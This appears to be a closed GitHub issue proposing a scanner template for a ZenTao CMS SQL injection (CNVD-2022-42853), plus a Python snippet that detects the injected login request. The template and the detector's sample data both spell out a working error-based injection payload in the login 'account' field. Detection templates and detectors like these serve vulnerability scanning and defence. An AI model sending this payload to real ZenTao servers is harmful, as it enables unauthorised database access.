Closed loulan-ling closed 2 years ago
Cookies and Referer are not recommended to be deleted; if deleted, some positives will be forgotten.
```yaml
id: CNVD-2022-42853

info:
  name: zentao cms sql injection
  author: ling
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
    cvss-score: 7.8
    cwe-id: CWE-89
  severity: high
  tags: zentao,cnvd,cnvd2022

requests:
  - raw:
      - |
        POST /zentao/user-login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: zentaosid=ugbh81khpk1r7p1oubmgeieon9; lang=zh-cn; device=desktop; theme=default
        Referer: http://{{Hostname}}/zentao/user-login.html

        account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cmd5%280%29%29%2C1%29+and+%271%27%3D%271

    matchers:
      - type: regex
        part: all
        regex:
          - "cfcd208495d565ef66e7dff9f98764d"
        condition: and
```
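For defenders, the request in the template above can be recognised on the server side by URL-decoding the `account` form field of a POST to the login page and looking for XML error-based SQL functions. The following is an added example, not part of the issue or of the project's templates; `inspect_request`, the extra `extractvalue` pattern and the host `zentao.example` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# updatexml() is the function used in the template; extractvalue() is its
# common sibling for error-based extraction (added here as an assumption).
SQLI_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
LOGIN_PATH = re.compile(r"/user-login(\.html)?$", re.IGNORECASE)

def inspect_request(raw: str) -> dict:
    """Classify one captured raw HTTP request (headers + body as text)."""
    verdict = {"login_endpoint": False, "suspicious": False, "reason": ""}
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n")[0].split(" ")
    if len(parts) != 3:                      # malformed request line
        return verdict
    method, target, _version = parts
    if method != "POST" or not LOGIN_PATH.search(urlsplit(target).path):
        return verdict
    verdict["login_endpoint"] = True
    # parse_qs URL-decodes values, so %27, %28 and '+' are normalised first.
    fields = parse_qs(body.strip(), keep_blank_values=True)
    for value in fields.get("account", []):
        hit = SQLI_FUNCS.search(value)
        if hit:
            verdict["suspicious"] = True
            verdict["reason"] = f"{hit.group(1).lower()}() in account field"
    return verdict

# Constructed sample traffic: the template's request body and a normal login.
HEADERS = (
    "POST /zentao/user-login.html HTTP/1.1\r\n"
    "Host: zentao.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
)
PROBE = HEADERS + (
    "account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cmd5%280%29%29"
    "%2C1%29+and+%271%27%3D%271"
)
BENIGN = HEADERS + "account=admin&password=constructed-value"

if __name__ == "__main__":
    for name, req in (("probe", PROBE), ("benign", BENIGN)):
        print(name, inspect_request(req))
```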
Hi @loulan-ling, Thank you for taking the time to create this issue and for contributing to this project 🍻